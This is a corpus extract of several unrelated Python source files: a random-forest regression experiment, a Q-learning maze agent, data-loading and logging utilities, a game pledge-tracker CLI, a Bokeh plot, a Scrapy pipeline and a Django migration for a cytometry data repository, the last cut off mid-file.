preprocessing.scale(X)\r\npca.fit(standardized_X)\r\npca1.fit(standardized_X)\r\npca2.fit(standardized_X)\r\n\r\n\r\npca.explained_variance_ratio_\r\npca1.explained_variance_ratio_\r\npca2.explained_variance_ratio_\r\n\r\nX1 = pca.fit_transform(standardized_X)\r\nX2 = pca1.fit_transform(standardized_X)\r\nX3 = pca2.fit_transform(standardized_X)\r\n\r\nX1_train, X1_test = train_test_split( X1, test_size = 0.1)\r\nX2_train, X2_test = train_test_split( X2, test_size = 0.1)\r\nX3_train, X3_test = train_test_split( X3, test_size = 0.1)\r\n\r\npandas.DataFrame(X1)\r\npandas.DataFrame(X2)\r\npandas.DataFrame(X3)\r\n\r\n\r\nreg1 = random_forest_model.fit(X1_train, Y_train)\r\nmodel1_out = reg1.predict(X1_test)\r\nreg1.score(X1_train, Y_train)\r\nreg1.score(X1_test,Y_test) \r\n\r\nreg2 = random_forest_model.fit(X_train.iloc[:,[2,3,6,7,1,4,5]], Y_train)\r\nmodel2_out = reg2.predict(X_test.iloc[:,[2,3,6,7,1,4,5]])\r\nreg2.score(X_train.iloc[:,[2,3,6,7,1,4,5]], Y_train) \r\nreg2.score(X_test.iloc[:,[2,3,6,7,1,4,5]],Y_test)\r\n\r\n\r\nreg3 = random_forest_model.fit(X_train.iloc[:,[0,2,3,6,7,1,4,5]], 
Y_train)\r\nmodel3_out = reg3.predict(X_test.iloc[:,[0,2,3,6,7,1,4,5]])\r\nreg3.score(X_train.iloc[:,[0,2,3,6,7,1,4,5]], Y_train) \r\nreg3.score(X_test.iloc[:,[0,2,3,6,7,1,4,5]],Y_test)\r\n\r\nreg4 = random_forest_model.fit(X2_train, Y_train)\r\nmodel4_out = reg1.predict(X2_test)\r\nreg4.score(X2_train, Y_train)\r\nreg4.score(X2_test,Y_test)\r\n\r\nreg5 = random_forest_model.fit(X3_train, Y_train)\r\nmodel4_out = reg1.predict(X3_test)\r\nreg4.score(X3_train, Y_train)\r\nreg4.score(X3_test,Y_test)\r\n\r\nreg2 = random_forest_model.fit(X_train.iloc[:,[2,3,1,4,5]], Y_train)\r\nmodel2_out = reg2.predict(X_test.iloc[:,[2,3,1,4,5]])\r\nreg2.score(X_train.iloc[:,[2,3,1,4,5]], Y_train) \r\nreg2.score(X_test.iloc[:,[2,3,1,4,5]],Y_test)\r\n#explained_variance_score(model1_out, Y_test)\r\n#explained_variance_score(model2_out, Y_test) \r\n#z = random_forest_model.predict(model_dataset.iloc[841:943,[1,2,4]])\r\n'''\r\n\r\n#fitting random forest only with ts\r\nreshaped_features = X_train.iloc[:,3].values.reshape(-1 ,1)\r\nreshaped_features_test = X_test.iloc[:,3].values.reshape(-1 ,1)\r\n\r\nrandom_forest_model.fit(reshaped_features, Y_train)\r\nrandom_forest_model.score(reshaped_features, Y_train)\r\nrandom_forest_model.score(reshaped_features_test, Y_test)\r\n\r\n\r\ntrain_predict = random_forest_model.predict(reshaped_features) \r\ntest_predict = random_forest_model.predict(reshaped_features_test) \r\nmape(Y_train.values, train_predict)\r\nmape(Y_test.values, test_predict)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, train_predict, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, test_predict, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"Cap8.py","file_name":"Cap8.py","file_ext":"py","file_size_in_byte":9967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196669053","text":"import numpy\nfrom package.framework.sensor import Sensor\n\nclass Agent:\n mov = None # Movement module\n qrl = None # Q Reinforcement Learning module\n exp = None # Exploration module\n sen = None # Sensor module\n\n # variable how to select next action\n action_selection = 'Greedy'\n\n def __init__(self, agent_id, maze_size, configuration):\n # dict which stores information about the agent\n self.info = dict()\n self.info['id'] = agent_id\n self.tau = 0.1\n self.config = configuration\n self.maze_shape = (maze_size[0], maze_size[1])\n\n self.step_counter = 0\n self.trial_counter = 0\n\n # some logged data variables\n self.history = []\n self.expertness_history = []\n self.steps_per_trial = []\n self.agent_list = [] # list of all agentcontroller\n\n # init traveled map\n self.traveled_map = numpy.zeros(maze_size, dtype=numpy.float) # map to store already visited locations\n self.traveled_map[:, 0, 0] = 1\n self.traveled_map[:,-1,0] = 1\n self.traveled_map[0,:,0] = 1\n self.traveled_map[-1,:,0] = 1\n\n # position variables\n self.current_position = None\n self.goal_position = None\n self.start_position = None\n\n self.one_action_per_step = False\n\n def init_modules(self, mov, qrl, exp):\n self.mov = mov\n self.qrl = qrl\n self.exp = exp\n self.sen = Sensor()\n\n 
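# hand each module a back-reference to this agent before initializing the rewards\n        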
self.mov.init_agent_modules(self)\n self.qrl.init_agent_modules(self)\n self.exp.init_agent_modules(self)\n\n self.qrl.init_reward_matrix(self.maze_shape)\n\n def run(self):\n if self.goal_reached(): # check if we reached the goal\n return True, self.current_position # return True because current position is goal position\n\n self.step_counter += 1\n\n self.add_current_position_to_history()\n\n action_list = self.qrl.get_action_list(self.mov.get_state(self.current_position), self.tau, self.action_selection) # get action list from Q matrix\n\n # override action_list if we do exploration\n if self.do_exploration():\n action_list = self.exp.get_action_list()\n\n # check actions and get next position and reward\n for action in action_list:\n # get next position\n next_position = self.mov.get_next_position(self.current_position, action) # get target position\n\n # check if we can move to next position\n if self.mov.check_action(self.current_position, action, next_position, self.sen): # check action if no obstacle is in the way\n self.move(action, next_position) # move to new location and get reward\n break # do not check any further actions in action_list\n else:\n self.stay(action, next_position) # stay and get reward\n break\n #if self.one_action_per_step:\n # self.step_counter += 1\n # break\n\n self.expertness_history.append(self.qrl.expertness)\n\n if self.goal_reached():\n self.steps_per_trial.append(self.step_counter)\n\n return False, self.current_position\n\n def move(self, action, next_position):\n # step reward as default\n use_reward_matrix = self.config.get('use_reward_matrix', 0)\n if use_reward_matrix:\n reward = self.qrl.reward_matrix[next_position[0], next_position[1]]\n else:\n reward = self.qrl.reward_step\n\n # check if goal position\n if [next_position[0], next_position[1]] in self.goal_position: # check if target is goal\n reward = self.qrl.reward_goal\n\n # update Q matrix\n self.qrl.update_Q_mat(action,\n self.mov.get_state(self.current_position),\n self.mov.get_state(next_position),\n reward) # update q with reward step\n\n # update expertness\n self.qrl.expertness = self.qrl.expertness_modul.update_expertness(self)\n\n # set current position to next position\n self.current_position = next_position\n\n def stay(self, action, next_position):\n # wall reward as default\n reward = self.qrl.reward_wall\n\n # check if robot at next position\n if self.robot_at_position(next_position):\n return 0\n # reward = self.qrl.reward_robot\n\n # update Q matrix\n self.qrl.update_Q_mat(action,\n self.mov.get_state(self.current_position),\n self.mov.get_state(next_position),\n reward) # update q with reward wall\n\n # update expertness\n self.qrl.expertness = self.qrl.expertness_modul.update_expertness(self)\n\n def goal_reached(self): # function to determine if goal is reached\n if [self.current_position[0], self.current_position[1]] in self.goal_position:\n return True\n return False\n\n def add_current_position_to_history(self):\n self.traveled_map[self.current_position[0], self.current_position[1], 0] = 1\n self.history.append([self.current_position[0], self.current_position[1]]) # add old position to history\n\n def do_exploration(self):\n if numpy.random.random_sample(1) < self.exp.get_exploration_rate(self.trial_counter):\n return True\n else:\n return False\n\n def robot_at_position(self, position):\n is_robot = False\n for agent in self.agent_list: # check if robot\n if position[0] == agent.current_position[0] and position[1] == agent.current_position[1]:\n is_robot = True\n 
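# stop scanning once any agent occupies the target cell\n                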
break\n return is_robot\n\n def reset(self, start, goal): # reset robot start and goal coordinates\n self.current_position = start\n self.goal_position = goal\n self.step_counter = 0\n self.trial_counter += 1\n self.traveled_map = numpy.zeros(numpy.shape(self.traveled_map), dtype=numpy.float) # map to store already visited locations\n self.traveled_map[:, 0, 0] = 1\n self.traveled_map[:, -1, 0] = 1\n self.traveled_map[0, :, 0] = 1\n self.traveled_map[-1, :, 0] = 1\n self.qrl.expertness = 0 # reset expertness after each trial?\n","sub_path":"src/package/framework/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652922840","text":"__all__ = ['pipeline']\n\nimport pandas as pd\nimport numpy as np\nfrom tools import sizeof_file\n\nclass Define():\n def __init__(self, data_path,data_name):\n\n self.data_path = data_path\n self.data_name = data_name\n self.response = 'pickups'\n\n self.n_features = None\n self.describe = None\n self.samples = None\n self.size = None\n self.data = None\n self.X = None\n self.y = None\n\n def pipeline(self):\n self.read()\n self.description()\n\n return self\n\n def read(self):\n self.head_y = None\n self.count = None\n try:\n if self.data_path is not None:\n self.data = pd.read_csv(self.data_path).round(3)\n self.X = self.data.loc[:, self.data.columns != self.response]\n self.X = self.X[[\"hora_num\",\"hora_cos\",\"hora_sin\", \"dia_num\",\"dia_cos\",\"dia_sin\",\"fin_semana\",\"latitud\",\"longitud\"]]\n self.y = self.data.loc[:, self.data.columns == self.response]\n self.y = np.ravel(self.y)\n except:\n print(\"Error reading\")\n\n def description(self):\n self.n_features = len(self.data.columns)-1\n self.samples = len(self.data)\n self.size = sizeof_file(self.data_path)\n\n self.describe = [self.data_name.replace(\".csv\",\"\"), self.n_features, self.samples, self.size]\n self.describe = pd.DataFrame([self.describe], columns = [\"name\",\"n_features\",\"samples\",\"size\"])\n return self.describe\n","sub_path":"TrafficPrediction-Dash/define.py","file_name":"define.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"575527695","text":"\"\"\"Main program entrypoint for the eso pledge tracker\"\"\"\nimport argparse\nimport sys\nfrom .ept_functions import handle_list, handle_next, handle_date\n\n\ndef main():\n \"\"\"Main method to parse arguments.\n If --help or --version are chosen, they will take precedence over all else\n and the program will terminate after handling them.\"\"\"\n parsed_args = parse_args(sys.argv[1:])\n if parsed_args.debug:\n print(vars(parsed_args))\n\n if parsed_args.list:\n handle_list(parsed_args.verbose)\n elif parsed_args.next:\n handle_next(parsed_args.next, parsed_args.verbose)\n else:\n handle_date(parsed_args.date, parsed_args.verbose)\n\n\ndef parse_args(args):\n \"\"\"Defines the argument parser\"\"\"\n parser = argparse.ArgumentParser(\n prog=\"ESO Pledge Tracker\",\n description=\n \"A simple CLI program to print information about Undaunted Pledges in ESO.\"\n )\n\n # optional arguments have a dash in the argument name\n parser.add_argument(\n \"-d\",\n \"--date\",\n type=int,\n help=\n (\"The default command if none are specified. Print the dungeons for \"\n \"before or after today's date(e.g. -1 is yesterday, 1 is tomorrow). 
\"\n \"If no arguments are specified, default to the current date.\"),\n default=0,\n metavar=\"\")\n parser.add_argument(\n \"-l\",\n \"--list\",\n help=\n (\"List all of the undaunted pledges (and their dungeon sets with verbose), \"\n \"starting with the current dungeon for each cycle.\"),\n action=\"store_true\")\n parser.add_argument(\"-v\",\n \"--verbose\",\n help=\"Make the output more verbose.\",\n action=\"store_true\")\n parser.add_argument(\n \"-n\",\n \"--next\",\n help=\"Get the next time a dungeon or dungeon set is available.\",\n metavar=\"\")\n # added for the fun of it, version numbers are currently meaningless\n parser.add_argument(\"--version\",\n action=\"version\",\n version=\"%(prog)s 0.1.0\")\n parser.add_argument(\n \"--debug\",\n action=\"store_true\",\n help=\"Print the argument parser's argv values for debugging purposes.\")\n\n return parser.parse_args(args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"eso_pledge_tracker/ept.py","file_name":"ept.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"628238947","text":"from bokeh.plotting import figure, output_file, show\n\noutput_file(\"demo.html\")\n\nx = [1,2,3,4,5]\ny = [5,6,7,8,9]\n\np = figure(plot_width=400, plot_height=400, title='DottedLine Chart Example')\n\np.line(x,y,line_width=2)\n\np.circle(x,y, fill_color='orange', size=6)\n\nshow(p)","sub_path":"Bokeh/sample3.py","file_name":"sample3.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"527444727","text":"import ujson as json\nimport numpy as np\nimport torch\nimport torch.utils.data as data\nimport logging\nfrom tqdm import tqdm\nimport os\n\ndef save(filename, obj):\n \"\"\"\n just saves the file, nothing fancy\n author: @wzhouad\n \"\"\"\n with open(filename, \"w\") as fh:\n json.dump(obj, fh)\n\ndef quick_clean(raw_str):\n \"\"\"\n args:\n - raw_str: a string to be quickly cleaned\n\n return\n - the original string w/ all quotes replaced as double quotes\n \"\"\"\n return raw_str.replace(\"''\", '\" ').replace(\"``\", '\" ')\n\ndef get_logger(log_dir, name):\n \"\"\"\n from @chrischute\n\n Get a `logging.Logger` instance that prints to the console\n and an auxiliary file.\n\n Args:\n log_dir (str): Directory in which to create the log file.\n name (str): Name to identify the logs.\n\n Returns:\n logger (logging.Logger): Logger instance for logging events.\n \"\"\"\n class StreamHandlerWithTQDM(logging.Handler):\n \"\"\"Let `logging` print without breaking `tqdm` progress bars.\n\n See Also:\n > https://stackoverflow.com/questions/38543506\n \"\"\"\n def emit(self, record):\n try:\n msg = self.format(record)\n tqdm.write(msg)\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n # Create logger\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # Log everything (i.e., DEBUG level and above) to a file\n log_path = os.path.join(log_dir, 'log.txt')\n file_handler = logging.FileHandler(log_path)\n file_handler.setLevel(logging.DEBUG)\n\n # Log everything except DEBUG level (i.e., INFO level and above) to console\n console_handler = StreamHandlerWithTQDM()\n console_handler.setLevel(logging.INFO)\n\n # Create format for the logs\n file_formatter = logging.Formatter('[%(asctime)s] %(message)s',\n datefmt='%m.%d.%y %H:%M:%S')\n file_handler.setFormatter(file_formatter)\n 
console_formatter = logging.Formatter('[%(asctime)s] %(message)s',\n                                datefmt='%m.%d.%y %H:%M:%S')\n    console_handler.setFormatter(console_formatter)\n\n    # add the handlers to the logger\n    logger.addHandler(file_handler)\n    logger.addHandler(console_handler)\n\n    return logger","sub_path":"exp-2-smol/toolkit.py","file_name":"toolkit.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266242161","text":"from crawler import data_utils\nfrom clusterizator.models import Page\n\n\nclass SpiderPipeline(object):\n    NAME_XPATH = 'name()'\n    CHILDREN_XPATH = 'child::*'\n    RESULT = '{} byt{} of data'\n\n    def _get_node_name(self, node):\n        return node.xpath(self.NAME_XPATH).extract_first()\n\n    def _get_node_children(self, node):\n        return node.xpath(self.CHILDREN_XPATH)\n\n    def get_node(self, node):\n        return [\n            self._get_node_name(node),\n            [self.get_node(c) for c in self._get_node_children(node)]\n        ]\n\n    def process_item(self, item, spider):\n        url = item[spider.URL_KEY]\n        node = self.get_node(item[spider.ROOT_NODE_KEY])\n        site_id = spider.site_id\n        data = data_utils.encode(node)\n        data_size = len(data)\n        if not url.endswith(u'/'):\n            url += u'/'\n        Page.objects.get_or_create(\n            url=url,\n            site_id=site_id,\n            data=data,\n            data_size=data_size\n        )\n        return self.RESULT.format(\n            data_size,\n            'e' if data_size == 1 else 'es'\n        )\n","sub_path":"source/crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"398504324","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nimport numpy as np\nimport argparse\n\ndef run(args):\n\n    csv_path = args.csv\n\n    csv = pd.read_csv(csv_path)\n    model_foldername = os.path.split(csv_path)[1][0:-4]\n    print('Generating masks for ' + model_foldername)\n    IMAGES_PATH = '/home/wences/Documents/src/images/images/'\n    PROJECTIONS_PATH = os.path.join('.', 'output', model_foldername, 'projections/')\n    MASKS_PATH = os.path.join('.','output', model_foldername, 'masks/')\n    ARRAYS_PATH = os.path.join('.','output', model_foldername, 'vote_arrays/')\n    BINARY_MASK_PATH = os.path.join('.','output', model_foldername, 'binary_masks/')\n    for directory in [PROJECTIONS_PATH, MASKS_PATH, ARRAYS_PATH, BINARY_MASK_PATH]:\n        os.makedirs(directory)\n\n    positive_patches = csv.loc[csv['svm_result'] > 0.5,:]\n\n    list_positive_images = positive_patches['image_name'].unique()\n\n    #for image_name in list_positive_images:\n    #    patches_from_image = positive_patches.loc[positive_patches['image_name'] == image_name,:]\n    #    img = cv2.cvtColor(cv2.imread(IMAGES_PATH + image_name), cv2.COLOR_BGR2RGB)\n    #    for idx, row in patches_from_image.iterrows():\n    #        cv2.rectangle(img,(row['top_left_corner_y'],row['top_left_corner_x']),(row['top_left_corner_y']+300,row['top_left_corner_x']+300),(0,255,0),int(row['svm_result']*35))\n    #    cv2.imwrite(PROJECTIONS_PATH + 'sw_'+ image_name, img)\n\n    for image_name in list_positive_images:\n        patches_from_image = positive_patches.loc[positive_patches['image_name'] == image_name,:]\n        img = cv2.cvtColor(cv2.imread(IMAGES_PATH + image_name), cv2.COLOR_BGR2RGB)\n        mask = np.zeros_like(img[:,:,0])\n        for idx, row in patches_from_image.iterrows():\n            x = row['top_left_corner_x']\n            y = row['top_left_corner_y']\n            mask[x:x+300,y:y+300] += 1\n            
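# each positive 300x300 window casts one vote on every pixel it covers\n            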
#cv2.rectangle(img,(row['top_left_corner_x'],row['top_left_corner_y']),(row['top_left_corner_x']+300,row['top_left_corner_y']+300),(0,255,0),20)\n cv2.imwrite(MASKS_PATH + 'mask_sw_'+ image_name, cv2.normalize(mask,None,0,255,cv2.NORM_MINMAX))\n\n for image_name in list_positive_images:\n patches_from_image = positive_patches.loc[positive_patches['image_name'] == image_name,:]\n img = cv2.cvtColor(cv2.imread(IMAGES_PATH + image_name), cv2.COLOR_BGR2RGB)\n mask = np.zeros_like(img[:,:,0])\n for idx, row in patches_from_image.iterrows():\n x = row['top_left_corner_x']\n y = row['top_left_corner_y']\n mask[x:x+300,y:y+300] += 1\n np.save(ARRAYS_PATH + 'mask_sw_'+ image_name[0:4]+'.npy', mask)\n\n npy_mask = os.listdir(ARRAYS_PATH)\n npy_mask = sorted(npy_mask)\n\n for npy_array in npy_mask:\n mask = np.load(ARRAYS_PATH + npy_array)\n mask[mask<3] = 0\n mask = np.uint8(mask.astype(bool))\n cv2.imwrite(BINARY_MASK_PATH + 'bin_' + npy_array[0:-4] + '.jpg', mask)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Run resulting mask generation for sliding windows detection csv report on bud images\")\n parser.add_argument(\"-csv\", help=\"csv containing the report generated by main.py\",\n dest=\"csv\", type=str, required=True)\n\n parser.set_defaults(func=run)\n\n args = parser.parse_args()\n\n if (not os.path.exists(args.csv)):\n parser.error('Invalid path to csv')\n \n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"generate_masks.py","file_name":"generate_masks.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"325117270","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport repository.models\nimport django.db.models.deletion\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BeadSample',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('acquisition_date', models.DateField()),\n ('includes_negative_control', models.BooleanField(default=False)),\n ('negative_control', models.BooleanField(default=False)),\n ('bead_file', models.FileField(max_length=256, upload_to=repository.models.bead_file_path)),\n ('original_filename', models.CharField(max_length=256, editable=False)),\n ('subsample', models.FileField(max_length=256, upload_to=repository.models.bead_subsample_file_path)),\n ('sha1', models.CharField(max_length=40, editable=False)),\n ('upload_date', models.DateTimeField(editable=False)),\n ('exclude', models.BooleanField(default=False)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BeadSampleMetadata',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('key', models.CharField(max_length=256)),\n ('value', models.CharField(max_length=2048)),\n ('bead_sample', models.ForeignKey(to='repository.BeadSample')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Compensation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=256)),\n ('compensation_file', 
models.FileField(max_length=256, upload_to=repository.models.compensation_file_path)),\n ('matrix_text', models.TextField()),\n ('acquisition_date', models.DateField()),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Cytometer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cytometer_name', models.CharField(max_length=128)),\n ('serial_number', models.CharField(max_length=256)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='beadsample',\n name='cytometer',\n field=models.ForeignKey(to='repository.Cytometer'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Fluorochrome',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fluorochrome_abbreviation', models.CharField(unique=True, max_length=32)),\n ('fluorochrome_name', models.CharField(unique=True, max_length=128)),\n ('fluorochrome_description', models.TextField(null=True, blank=True)),\n ],\n options={\n 'ordering': [b'fluorochrome_abbreviation'],\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='beadsample',\n name='compensation_channel',\n field=models.ForeignKey(to='repository.Fluorochrome', null=True),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Marker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('marker_abbreviation', models.CharField(unique=True, max_length=32)),\n ('marker_name', models.CharField(unique=True, max_length=128)),\n ('marker_description', models.TextField(null=True, blank=True)),\n ],\n options={\n 'ordering': [b'marker_abbreviation'],\n 'verbose_name_plural': b'Markers',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProcessRequest',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=128)),\n ('predefined', models.CharField(blank=True, max_length=64, null=True, choices=[(b'1', b'Subsampled, asinh, HDP'), (b'2', b'Subsampled, logicle, HDP')])),\n ('request_date', models.DateTimeField(auto_now_add=True)),\n ('assignment_date', models.DateTimeField(null=True, blank=True)),\n ('completion_date', models.DateTimeField(null=True, editable=False, blank=True)),\n ('status', models.CharField(max_length=32, choices=[(b'Pending', b'Pending'), (b'Working', b'Working'), (b'Error', b'Error'), (b'Completed', b'Completed')])),\n ('request_user', models.ForeignKey(editable=False, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProcessRequestInput',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=1024)),\n ('process_request', models.ForeignKey(to='repository.ProcessRequest')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProcessRequestOutput',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('key', models.CharField(max_length=1024)),\n ('value', models.FileField(max_length=256, upload_to=repository.models.pr_output_path)),\n ('process_request', models.ForeignKey(to='repository.ProcessRequest')),\n ],\n options={\n 'abstract': 
False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('project_name', models.CharField(unique=True, max_length=128, verbose_name=b'Project Name')),\n ('project_desc', models.TextField(help_text=b'A short description of the project', null=True, verbose_name=b'Project Description', blank=True)),\n ],\n options={\n 'permissions': ((b'view_project_data', b'View Project Data'), (b'add_project_data', b'Add Project Data'), (b'modify_project_data', b'Modify/Delete Project Data'), (b'submit_process_requests', b'Submit Process Requests'), (b'manage_project_users', b'Manage Project Users')),\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequest',\n name='project',\n field=models.ForeignKey(to='repository.Project'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='ProjectPanel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('panel_name', models.CharField(max_length=128)),\n ('panel_description', models.TextField(help_text=b'A short description of the panel', null=True, verbose_name=b'Panel Description', blank=True)),\n ('staining', models.CharField(max_length=2, choices=[(b'FS', b'Full Stain'), (b'US', b'Unstained'), (b'FM', b'Fluorescence Minus One'), (b'IS', b'Isotype Control'), (b'CB', b'Compensation Bead')])),\n ('parent_panel', models.ForeignKey(blank=True, to='repository.ProjectPanel', null=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProjectPanelParameter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('parameter_type', models.CharField(max_length=3, choices=[(b'FSC', b'Forward Scatter'), (b'SSC', b'Side Scatter'), (b'FCM', b'Fluorochrome Conjugated Marker'), (b'UNS', b'Unstained'), (b'ISO', b'Isotype Control'), (b'EXC', b'Exclusion'), (b'VIA', b'Viability'), (b'ICM', b'Isotope Conjugated Marker'), (b'TIM', b'Time'), (b'BEA', b'Bead'), (b'NUL', b'Null')])),\n ('parameter_value_type', models.CharField(blank=True, max_length=1, null=True, choices=[(b'H', b'Height'), (b'W', b'Width'), (b'A', b'Area'), (b'T', b'Time')])),\n ('fluorochrome', models.ForeignKey(blank=True, to='repository.Fluorochrome', null=True)),\n ('project_panel', models.ForeignKey(to='repository.ProjectPanel')),\n ],\n options={\n 'ordering': [b'parameter_type', b'parameter_value_type'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProjectPanelParameterMarker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('marker', models.ForeignKey(to='repository.Marker')),\n ('project_panel_parameter', models.ForeignKey(to='repository.ProjectPanelParameter')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Sample',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('pretreatment', models.CharField(max_length=32, choices=[(b'In vitro', b'In vitro'), (b'Ex vivo', b'Ex vivo')])),\n ('storage', models.CharField(max_length=32, choices=[(b'Fresh', b'Fresh'), (b'Cryopreserved', b'Cryopreserved')])),\n ('acquisition_date', models.DateField()),\n ('sample_file', models.FileField(max_length=256, 
upload_to=repository.models.fcs_file_path)),\n ('original_filename', models.CharField(max_length=256, editable=False)),\n ('subsample', models.FileField(max_length=256, upload_to=repository.models.subsample_file_path)),\n ('sha1', models.CharField(max_length=40, editable=False)),\n ('upload_date', models.DateTimeField(editable=False)),\n ('exclude', models.BooleanField(default=False)),\n ('compensation', models.ForeignKey(blank=True, to='repository.Compensation', null=True)),\n ('cytometer', models.ForeignKey(to='repository.Cytometer')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SampleCollection',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequest',\n name='sample_collection',\n field=models.ForeignKey(editable=False, to='repository.SampleCollection'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SampleCollectionMember',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('sample', models.ForeignKey(to='repository.Sample', on_delete=django.db.models.deletion.SET_NULL, null=True)),\n ('sample_collection', models.ForeignKey(to='repository.SampleCollection')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='samplecollectionmember',\n unique_together=set([(b'sample_collection', b'sample')]),\n ),\n migrations.CreateModel(\n name='SampleMetadata',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('key', models.CharField(max_length=256)),\n ('value', models.CharField(max_length=2048)),\n ('sample', models.ForeignKey(to='repository.Sample')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Site',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('site_name', models.CharField(max_length=128)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'permissions': ((b'view_site_data', b'View Site'), (b'add_site_data', b'Add Site Data'), (b'modify_site_data', b'Modify/Delete Site Data')),\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='cytometer',\n name='site',\n field=models.ForeignKey(to='repository.Site'),\n 